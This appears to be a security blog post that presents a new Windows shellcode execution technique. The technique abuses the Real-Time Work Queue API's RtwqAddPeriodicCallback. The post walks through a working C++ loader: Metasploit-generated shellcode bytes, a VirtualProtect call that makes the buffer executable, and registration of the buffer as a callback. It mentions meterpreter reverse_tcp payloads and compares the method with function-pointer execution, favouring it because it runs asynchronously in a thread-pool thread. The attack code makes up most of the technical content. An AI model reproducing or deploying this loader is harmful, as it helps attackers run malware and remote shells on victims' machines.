.Rtwq Shellcode Execution

Overview

While I was reviewing existing shellcode injection techniques in windows x64 (10/11) I was particularly impressed by the simplicity of callback injection techniques, simple to code and versatile enough to sometimes enable remote process injection. Hence my previous blog entry about it.
This time I started by reading on Processes and threads, since these are the basic units for running code in windows. It was fun to look at thread pools and fibers, and see how these were weaponized for shellcode execution, really impressive. Trying to find something else that could be useful I turned my attention to UMS - User-mode scheduler - essentially a thread scheduling mechanism, seemed promising at first but with this Note: As of Windows 11, user-mode scheduling is not supported. All calls fail with the error ERROR_NOT_SUPPORTED. I decided it wasn't worth to work on an already discontinued and obsolete technology. Then came Multimedia Class Scheduler Service (MMCSS)

What is Rtwq

Under Multimedia Class Scheduler Service, theres an API set used to manage work queues called Real-Time Work Queue API (Rtwq). This management platform seems to use thread pools and worker threads to implement and dispatch work items. Rtwq's legitimate use flow seems to be something like this:

Create Work queue
Create an IRtwqAsyncResult interface - the work item
Then schedule the execution of the work item by placing it in a working queue

The asynchronous nature of Rtwq's work items is particularly interesting since it might allow me to avoid blocking the injector program.

All in all theres an interesting base for running shellcode here, we have a set of functions for asynchronous execution of threads in a work queue, but can we weaponize it? Yup.

How do you weaponize it

So far i haven't been able to perform remote code injection, i'll eventually get there. But its relatively easy to run code under the injector process.

Shellcode execution with RtwqAddPeriodicCallback

This execution method uses RtwqAddPeriodiCallback to register a callback with our shellcode. Looking at its definition:

HRESULT RtwqAddPeriodicCallback(
  [in]            RTWQPERIODICCALLBACK Callback,
                  IUnknown             *context,
  [out, optional] DWORD                *key
);

This seemed simple enough to quickly get up and running, allocate or embed the payload in the parent process, change memory permissions for execution and cast the buffer's address pointer as RTWQPERIODICCALLBACK.

Theres a small hindrance to overcome here, we need to link additional dependencies to compile with Rtwq:

This was my process using visual studio installer, you can do this in linux too, don't care if its better or worse, went this way to not have to bother too much with the development environment. What needs to be done:

Visual studio installer
Modify install version of Visual Studio
Individual Components tab
Search and check the boxes for:
1. Media Foundation
2. Windows 10 SDK or Windows 11 SDK depending on the target OS
Modify to install the components.

Now we need to link against the following libraries:

mfplat.lib
mf.lib
mfuuid.lib
rtworkq.lib

placehold Go to project properties, Configuration Properties, Linker and start with General, here we need to add the folder with the .lib files, in my case these were at C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\x64.

Then move on to input and specify in Additional Dependencies the .lib files in the list before: placehold

This should be enough to compile everything, if there are still dependency errors, sucks to be you, roll up your sleeves and get cracking.

Lets go through the code:

#include <iostream>
#include <windows.h>
#include <rtworkq.h>
using namespace std;

Standard dependencies, with the odd one being rtworkq.h, this is the header file with the declarations we need to use Rtwq.

unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
...

Add the shellcode wherever, I hardcoded it as a global variable, generated using metasploit for simplicity.

int main()
{
    HRESULT hr = S_OK;
    DWORD callbackkey = 0x00;
    hr = RtwqStartup();
    if(Failed(hr)){
        cout << "rtwq startup failed add more code to fetch the error if you want" << endl;
    }
...

Started with variable definition, hr to capture the result of RtwqAddPeriodicCallback call and callbackkey which is also needed by the same function, this key can be used to interrupt the callback function using RtwqRemovePeriodicCallback shuting down any code running there.

...
    LPVOID lpstub = (LPVOID)buf;
    DWORD oldprotect;

    BOOL r = VirtualProtect(lpstub, sizeof(buf), PAGE_EXECUTE_READ, &oldprotect);

    if (!r) {
        cout << "failed memory preparation" << endl;
        return -1;
    }
...

Cast buf to LPVOID, define oldprotect and made the buf memory space as executable, of course you can download the shellcode in runtime, allocate memory for it in the heap and make it executable, here its hardcoded since payload distribution is out of scope.

    hr = RtwqAddPeriodicCallback((RTWQPERIODICCALLBACK)lpstub, nullptr, &callbackKey);
    if (FAILED(hr)) {
        cout << "rtwq add periodic callback failed" << endl;
    }
    getchar();
    RtwqRemovePeriodicCallback(callbackKey);
    RtwqShutdown();
    return 0;
}

In this section we actually get the callback running, cast lpstub to RTWQPERIODICCALLBACK and set as the first argument, the context pointer can be null despite not being defined as optional and finally pass the callbackkey as the last argument. If the call was successfull the shellcode should execute shortly, the callback runs asynchronously at a fixed interval which the documentation unfortunately does not define**. getchar(); is being used to stop the mainthread so that execution is not interrupted. RtwqRemovePeriodicCallback(callbackKey); will cancel the callback function identified by the provided key and RtwqShutdown(); will shutdown the Rtwq platform***. In the following example i'm using a stageless payload which spawns a new process.

placehold

In this gif I use a staged meterpreter payload, in which you can clearly see that the shellcode did not block the main thread.

placehold

But where is it running?

The shellcode is obviously not being injected in a remote process, but its also not running in the mainthread, either if it spawns a new process or not it depends on its payload. Lets consider a staged x64 meterpreter payload windows/x64/meterpreter/reverse_tcp.
Looking at the injector process before the callback executes: placehold

After the payload triggers: placehold

Compare with function pointer shellcode execution

Using function pointer casting:

LPVOID lpstub = (LPVOID)buf;
DWORD oldprotect;

BOOL r = VirtualProtect(lpstub, sizeof(buf), PAGE_EXECUTE_READ, &oldprotect);

if (!r) {
    cout << "failed memory preparation" << endl;
    return -1;
}

cout << "press to trigger payload" << endl;

getchar();

((void(*)())lpstub)();

cout << "blocking mainthread" << endl;

getchar();

We get a similar thread profile before payload execution: placehold

After executing the shellcode we can see its running in the processes's main thread: placehold

So this specific callback technique has a clear advantage vs simple function pointer casting, the code is running asynchronously in a separate thread pool thread, you still need to be careful since unhandled exceptions triggered in these threads will affect the main process and cause a crash.

Refs

*https://learn.microsoft.com/en-us/windows/win32/api/rtworkq/nf-rtworkq-rtwqscheduleworkitem
**https://learn.microsoft.com/en-us/windows/win32/api/rtworkq/nf-rtworkq-rtwqaddperiodiccallback
***https://learn.microsoft.com/en-us/windows/win32/api/rtworkq/nf-rtworkq-rtwqshutdown